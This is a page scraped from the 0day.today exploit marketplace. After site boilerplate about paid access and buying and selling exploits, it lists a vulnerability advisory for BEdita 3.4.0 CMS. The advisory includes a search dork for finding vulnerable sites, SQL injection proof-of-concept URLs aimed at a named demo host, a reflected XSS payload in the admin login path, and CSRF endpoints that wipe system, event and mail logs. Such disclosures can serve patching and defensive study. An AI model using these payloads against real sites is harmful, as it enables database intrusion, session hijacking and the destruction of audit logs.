0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BEdita 3.4.0 CMS Multiple Vulnerabilities
#Title: BEdita 3.4.0 CMS Multiple Vulnerabilities #Vendor: bedita.com #Demo: site.demo.bedita.com #Version: 3.4.0 (Latest ATM) #Date: 02.06.14 #Dork: intext:"Proudly powered by BEdita" #Contact: smash[at]devilteam.pl #1 - SQL Injection via user_created So, anyone is able to search for publications using specific user ID. For example, if i would like to seek for news from user with ID 1, url would look like: host/search/user_created:1 Parameter user_created is vulnerable to sql injection - sql error appears when parameter is incorrectly modified. PoC: site.demo.bedita.com/search/user_created:1' and '1'='1 site.demo.bedita.com/search/user_created:1' and '1'='2 #2 - Cross Site Scripting at admin panel (login page) Since url is being used in javascript as remote_url_response parameter, attacker is able to execute xss because of poor filtration. host/authentications/xss";%20alert(666);%20lel="123 Source will look like: <script type="text/javascript"> var remote_url_response = "/pages/helpOnline/authentications/xss"; alert(666); lel="123"; (...) PoC: manage.demo.bedita.com/authentications/xss";%20alert(666);%20lel="123 #3 CSRF a) Delete system events localhost/bedita/index.php/admin/deleteEventLog b) Delete system logs localhost/bedita/index.php/admin/emptySystemLog c) Delete mail logs localhost/bedita/index.php/admin/deleteAllMailLogs # 0day.today [2024-11-16] #